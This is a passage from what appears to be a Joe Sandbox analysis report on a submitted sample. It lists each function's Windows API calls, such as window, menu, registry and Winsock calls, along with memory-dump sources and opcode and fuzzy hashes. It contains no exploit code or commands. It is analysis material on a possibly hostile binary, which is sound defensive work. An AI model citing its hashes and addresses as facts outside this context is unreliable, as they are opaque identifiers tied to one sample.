                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                              • String ID:
                                              • API String ID: 3761583154-0
                                              • Opcode ID: 1c27dc3676424c69a87a67642d1eb7c59609a57eb2a734492cd17bfdcc87b411
                                              • Instruction ID: bab932414a9f8dbb026fa119a0ac5cf441280d4a6e889c584923d8636a01a1e2
                                              • Opcode Fuzzy Hash: 1c27dc3676424c69a87a67642d1eb7c59609a57eb2a734492cd17bfdcc87b411
                                              • Instruction Fuzzy Hash: D1217935609105BF9B10DFA8DC88DBB77ECEB093607508166F916CB660EA70DC41CB64
                                              Function 00BD75CD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B51D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00B51D73
                                                • Part of subcall function 00B51D35: GetStockObject.GDI32(00000011), ref: 00B51D87
                                                • Part of subcall function 00B51D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00B51D91
                                              • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00BD7632
                                              • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00BD763F
                                              • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00BD764A
                                              • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00BD7659
                                              • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00BD7665
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: MessageSend$CreateObjectStockWindow
                                              • String ID: Msctls_Progress32
                                              • API String ID: 1025951953-3636473452
                                              • Opcode ID: 01bee5a52cc59dacc1c45217c30d40014079b9ecc12cd37c507ff5100f9cb156
                                              • Instruction ID: 2d32113ed6addb12c686b7694d425f546c0dc11412e87eeaac5f96aa251d762b
                                              • Opcode Fuzzy Hash: 01bee5a52cc59dacc1c45217c30d40014079b9ecc12cd37c507ff5100f9cb156
                                              • Instruction Fuzzy Hash: 6E11B6B1150119BFEF158F64CC85EE7BF6DEF08798F014115BA04A21A0EB72DC21DBA4
                                              Function 00B79AE6 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • __init_pointers.LIBCMT ref: 00B79AE6
                                                • Part of subcall function 00B73187: RtlEncodePointer.NTDLL(00000000), ref: 00B7318A
                                                • Part of subcall function 00B73187: __initp_misc_winsig.LIBCMT ref: 00B731A5
                                                • Part of subcall function 00B73187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00B79EA0
                                                • Part of subcall function 00B73187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00B79EB4
                                                • Part of subcall function 00B73187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00B79EC7
                                                • Part of subcall function 00B73187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00B79EDA
                                                • Part of subcall function 00B73187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00B79EED
                                                • Part of subcall function 00B73187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00B79F00
                                                • Part of subcall function 00B73187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00B79F13
                                                • Part of subcall function 00B73187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00B79F26
                                                • Part of subcall function 00B73187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00B79F39
                                                • Part of subcall function 00B73187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00B79F4C
                                                • Part of subcall function 00B73187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00B79F5F
                                                • Part of subcall function 00B73187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00B79F72
                                                • Part of subcall function 00B73187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00B79F85
                                                • Part of subcall function 00B73187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00B79F98
                                                • Part of subcall function 00B73187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00B79FAB
                                                • Part of subcall function 00B73187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00B79FBE
                                              • __mtinitlocks.LIBCMT ref: 00B79AEB
                                              • __mtterm.LIBCMT ref: 00B79AF4
                                                • Part of subcall function 00B79B5C: RtlDeleteCriticalSection.NTDLL(00000000), ref: 00B79C56
                                                • Part of subcall function 00B79B5C: _free.LIBCMT ref: 00B79C5D
                                                • Part of subcall function 00B79B5C: RtlDeleteCriticalSection.NTDLL(00C0EC00), ref: 00B79C7F
                                              • __calloc_crt.LIBCMT ref: 00B79B19
                                              • __initptd.LIBCMT ref: 00B79B3B
                                              • GetCurrentThreadId.KERNEL32 ref: 00B79B42
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                              • String ID:
                                              • API String ID: 3567560977-0
                                              • Opcode ID: fe6b3a0605a95e3c503b06c467115b59ed7865f46a842d7f9f61f738295545c9
                                              • Instruction ID: a3d792a3b8cbd202e7dd9321490c9b3a74dea6172018385965d7f73cd02ae927
                                              • Opcode Fuzzy Hash: fe6b3a0605a95e3c503b06c467115b59ed7865f46a842d7f9f61f738295545c9
                                              • Instruction Fuzzy Hash: C7F0903254A7126AE6347B74BC07B8A27D1DF02730F20CAEAF57CD61D2FF20884141A0
                                              Function 00B7406B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00B73F85), ref: 00B74085
                                              • GetProcAddress.KERNEL32(00000000), ref: 00B7408C
                                              • RtlEncodePointer.NTDLL(00000000), ref: 00B74097
                                              • RtlDecodePointer.NTDLL(00B73F85), ref: 00B740B2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                              • String ID: RoUninitialize$combase.dll
                                              • API String ID: 3489934621-2819208100
                                              • Opcode ID: c0223a6653b44cd07f40a51653a4fe846a0f4fccdec8b3977a19951b56508483
                                              • Instruction ID: 8bd2a7d5c656f4c1964015e0843eded6867060b0f8d315b13a3ae295781b98b4
                                              • Opcode Fuzzy Hash: c0223a6653b44cd07f40a51653a4fe846a0f4fccdec8b3977a19951b56508483
                                              • Instruction Fuzzy Hash: 65E09A7058A241ABEA119F61EC19B597AE5B705746F208075F112E21E0DFB64604DA14
                                              Function 00BC6B03 Relevance: 9.2, APIs: 6, Instructions: 250networkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • __WSAFDIsSet.WS2_32(00000000,?), ref: 00BC6C00
                                              • WSAGetLastError.WS2_32(00000000), ref: 00BC6C34
                                              • htons.WS2_32(?), ref: 00BC6CEA
                                              • inet_ntoa.WS2_32(?), ref: 00BC6CA7
                                                • Part of subcall function 00BAA7E9: _strlen.LIBCMT ref: 00BAA7F3
                                                • Part of subcall function 00BAA7E9: _memmove.LIBCMT ref: 00BAA815
                                              • _strlen.LIBCMT ref: 00BC6D44
                                              • _memmove.LIBCMT ref: 00BC6DAD
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                              • String ID:
                                              • API String ID: 3619996494-0
                                              • Opcode ID: 1c14edc99f526f8a03a67dd0f1fcb7054acb750315bde6b03376ad3e48fb12e4
                                              • Instruction ID: 433bfdc74c12be102462d37a90cfcad9a6b5e07748f2c6317b605d096bf1c2e6
                                              • Opcode Fuzzy Hash: 1c14edc99f526f8a03a67dd0f1fcb7054acb750315bde6b03376ad3e48fb12e4
                                              • Instruction Fuzzy Hash: 6181A071208300ABD710EB24CC96F6AB7E8EF84714F1449ADF9569B2E2DB70DD05CB62
                                              Function 00BB64B8 Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: _memmove$__itow__swprintf
                                              • String ID:
                                              • API String ID: 3253778849-0
                                              • Opcode ID: e2a829fb8478e28b87f82a18d603bb5082bfab9ba9f422072b5fb86ac937802f
                                              • Instruction ID: 03a47184b5b677349ac2893860b8ba8029d34e5e6635e66b296bfce904642b00
                                              • Opcode Fuzzy Hash: e2a829fb8478e28b87f82a18d603bb5082bfab9ba9f422072b5fb86ac937802f
                                              • Instruction Fuzzy Hash: 1A616A3090065A9BDF11EF64CC82BFE37E5AF05308F0445E9FC5A6B192DA78AD19CB51
                                              Function 00BD01E4 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B57DE1: _memmove.LIBCMT ref: 00B57E22
                                                • Part of subcall function 00BD0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00BCFDAD,?,?), ref: 00BD0E31
                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BD02BD
                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00BD02FD
                                              • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00BD0320
                                              • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00BD0349
                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00BD038C
                                              • RegCloseKey.ADVAPI32(00000000), ref: 00BD0399
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                              • String ID:
                                              • API String ID: 4046560759-0
                                              • Opcode ID: fb65013afe229c407330b7a39b42212039927fd69b5570a292e6092b87b516db
                                              • Instruction ID: 858f21f1ad90d822d41cdb45ea28fd9af1bc3b8770543e994d5c15d16c08f31b
                                              • Opcode Fuzzy Hash: fb65013afe229c407330b7a39b42212039927fd69b5570a292e6092b87b516db
                                              • Instruction Fuzzy Hash: 96516C71218304AFC710EF64D895E6EBBE8FF89314F04499EF855872A1EB31E909CB52
                                              Function 00BD5799 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetMenu.USER32(?), ref: 00BD57FB
                                              • GetMenuItemCount.USER32(00000000), ref: 00BD5832
                                              • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00BD585A
                                              • GetMenuItemID.USER32(?,?), ref: 00BD58C9
                                              • GetSubMenu.USER32(?,?), ref: 00BD58D7
                                              • PostMessageW.USER32(?,00000111,?,00000000), ref: 00BD5928
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Menu$Item$CountMessagePostString
                                              • String ID:
                                              • API String ID: 650687236-0
                                              • Opcode ID: 7f7cc3b23fa69d1d63ff2848f84ea2da718efdd7efbea276a6873dde56b5934a
                                              • Instruction ID: 7cce33a29f35f4ff8ec84fe43652345d46e20d68a9371a00950ac53c53fde9a1
                                              • Opcode Fuzzy Hash: 7f7cc3b23fa69d1d63ff2848f84ea2da718efdd7efbea276a6873dde56b5934a
                                              • Instruction Fuzzy Hash: 00517C31E01A15EFCF10EF64C855AAEB7F4EF48310F1040A6E816AB351DB75AE419B90
                                              Function 00BAEEEC Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                                              Download Yara Rule
                                              APIs
                                              • VariantInit.OLEAUT32(?), ref: 00BAEF06
                                              • VariantClear.OLEAUT32(00000013), ref: 00BAEF78
                                              • VariantClear.OLEAUT32(00000000), ref: 00BAEFD3
                                              • _memmove.LIBCMT ref: 00BAEFFD
                                              • VariantClear.OLEAUT32(?), ref: 00BAF04A
                                              • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00BAF078
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Variant$Clear$ChangeInitType_memmove
                                              • String ID:
                                              • API String ID: 1101466143-0
                                              • Opcode ID: 11c6a21bff0d86b316f446e421ed542d0ecdec8cadcb875e931a4136a308133e
                                              • Instruction ID: 151b5b3d21c36c2ced26e2406ecbed2465667615c015f0d03595d6d50ca0bb78
                                              • Opcode Fuzzy Hash: 11c6a21bff0d86b316f446e421ed542d0ecdec8cadcb875e931a4136a308133e
                                              • Instruction Fuzzy Hash: 67516D75A0020AEFDB24CF58C890AAAB7F8FF4D314B15856AE959DB301E735E911CF90
                                              Function 00BB220A Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • _memset.LIBCMT ref: 00BB2258
                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00BB22A3
                                              • IsMenu.USER32(00000000), ref: 00BB22C3
                                              • CreatePopupMenu.USER32 ref: 00BB22F7
                                              • GetMenuItemCount.USER32(000000FF), ref: 00BB2355
                                              • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00BB2386
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                              • String ID:
                                              • API String ID: 3311875123-0
                                              • Opcode ID: 642f937eaf146de231839f02788fc9cd2e763ed1a4e9c72e33a26c36b2c0eaba
                                              • Instruction ID: d2949a4e5c03a4deef456a96bd5b2231885b887a12d9fd4ad03d315efd809fc0
                                              • Opcode Fuzzy Hash: 642f937eaf146de231839f02788fc9cd2e763ed1a4e9c72e33a26c36b2c0eaba
                                              • Instruction Fuzzy Hash: 9E51CF30A0120ADFDF21CF68D888BFEBBF5EF45318F1041A9E811972A0D7B48944CB55
                                              Function 00B51765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B52612: GetWindowLongW.USER32(?,000000EB), ref: 00B52623
                                              • BeginPaint.USER32(?,?,?,?,?,?), ref: 00B5179A
                                              • GetWindowRect.USER32(?,?), ref: 00B517FE
                                              • ScreenToClient.USER32(?,?), ref: 00B5181B
                                              • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00B5182C
                                              • EndPaint.USER32(?,?), ref: 00B51876
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                              • String ID:
                                              • API String ID: 1827037458-0
                                              • Opcode ID: 9b449d45fa41c0ce08efccdf4a7c26d55db787b5b185721cba39531e1975f957
                                              • Instruction ID: 994753b922fc0c7c573be4b91f44f0a20729186e6ce03f2249413325237545f7
                                              • Opcode Fuzzy Hash: 9b449d45fa41c0ce08efccdf4a7c26d55db787b5b185721cba39531e1975f957
                                              • Instruction Fuzzy Hash: 11419C71504601EFD720DF28CC84FBA7BE8FB4A725F044AA9F9A5872B1D7309849DB61
                                              Function 00BDB69E Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • ShowWindow.USER32(00C157B0,00000000,00F921C0,?,?,00C157B0,?,00BDB5A8,?,?), ref: 00BDB712
                                              • EnableWindow.USER32(00000000,00000000), ref: 00BDB736
                                              • ShowWindow.USER32(00C157B0,00000000,00F921C0,?,?,00C157B0,?,00BDB5A8,?,?), ref: 00BDB796
                                              • ShowWindow.USER32(00000000,00000004,?,00BDB5A8,?,?), ref: 00BDB7A8
                                              • EnableWindow.USER32(00000000,00000001), ref: 00BDB7CC
                                              • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00BDB7EF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Window$Show$Enable$MessageSend
                                              • String ID:
                                              • API String ID: 642888154-0
                                              • Opcode ID: 048f46d94350afee4b01a53d37d848d5d5012028064a5b3df595478a03a2a2dd
                                              • Instruction ID: 24b4aa5bd017cf438fa5b8801036aff1153e06d18c52c2ce31e9b2ced28d00ce
                                              • Opcode Fuzzy Hash: 048f46d94350afee4b01a53d37d848d5d5012028064a5b3df595478a03a2a2dd
                                              • Instruction Fuzzy Hash: F9416A34605241EFDB26CF24C499FA4BBE0FB45310F1981EAE9598F7A2DB31AC56CB50
                                              Function 00BC709E Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                              Download Yara Rule
